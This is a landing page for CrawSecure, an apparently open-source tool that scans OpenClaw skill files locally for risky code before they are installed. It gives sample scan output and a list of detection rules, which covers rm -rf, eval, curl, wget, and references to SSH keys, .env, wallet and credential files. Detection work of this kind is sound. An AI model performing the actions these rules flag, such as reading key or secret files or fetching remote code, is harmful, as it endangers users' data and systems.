Privacy-first Β· Offline Β· Open source
OpenClaw Skills
Scan skills. Keep your code.
Detect dangerous patterns in ClawHub skills before you install them. Analysis runs entirely on your machine.
βskills scanned
13detection rules
.js .ts .shfile types
bash
$ npx crawsecure ./my-skill ββββββββββββββββββββββββββββββββββββββββββββββββββββ β CrawSecure v2 Β· @username [FREE] β ββββββββββββββββββββββββββββββββββββββββββββββββββββ Target: ./my-skill π¨ Security signals found: 3 π΄ [HIGH] Detected eval() usage β src/index.js π‘ [MEDIUM] child_process detected β src/utils.js π’ [LOW] process.env access β src/config.js π Risk score: 8500 β HIGH Scan saved β crawsecure.com/dashboard/abc123 Free Β· 3 / 10 scans this month
How it works
Three steps, zero uploads, instant results.
01
Drop files or run the CLI
Drag project files into the browser scanner, or run `npx crawsecure .` from any directory.
02
Analysis runs locally
The engine reads file contents in memory and applies 13 security rules. Nothing leaves your device.
03
Get your security report
See which rules fired, severity levels, and an overall risk score β instantly.
What we detect
13 stable rule IDs β all public, all auditable.
rm-rfDestructive rm -rf command
evalDynamic code execution via eval()
execProcess execution via exec()
ssh-dirReferences .ssh directory
id-rsaReferences SSH private key
child-processExecutes system commands
spawnChild process via spawn()
curlNetwork request via curl
wgetFile download via wget
dotenvReferences .env file (secrets)
walletReferences wallet file
credentialsReferences credentials file
process-envAccess to environment variables
High riskMedium riskLow risk
Your code never touches our servers. Ever.
Open DevTools β Network tab while running a scan. You will see zero outbound requests during analysis. If you choose to save a scan, you'll see exactly what is sent β a handful of numbers, nothing more.
Read our privacy commitment- Code processed entirely in memory β never written to disk
- Only aggregated numbers saved (if you choose to)
- No file names, no paths, no code snippets β ever
- Fully auditable: open source, MIT license
Frequently asked questions
Ready to scan?
No account required. Sign in only when you want to save your history.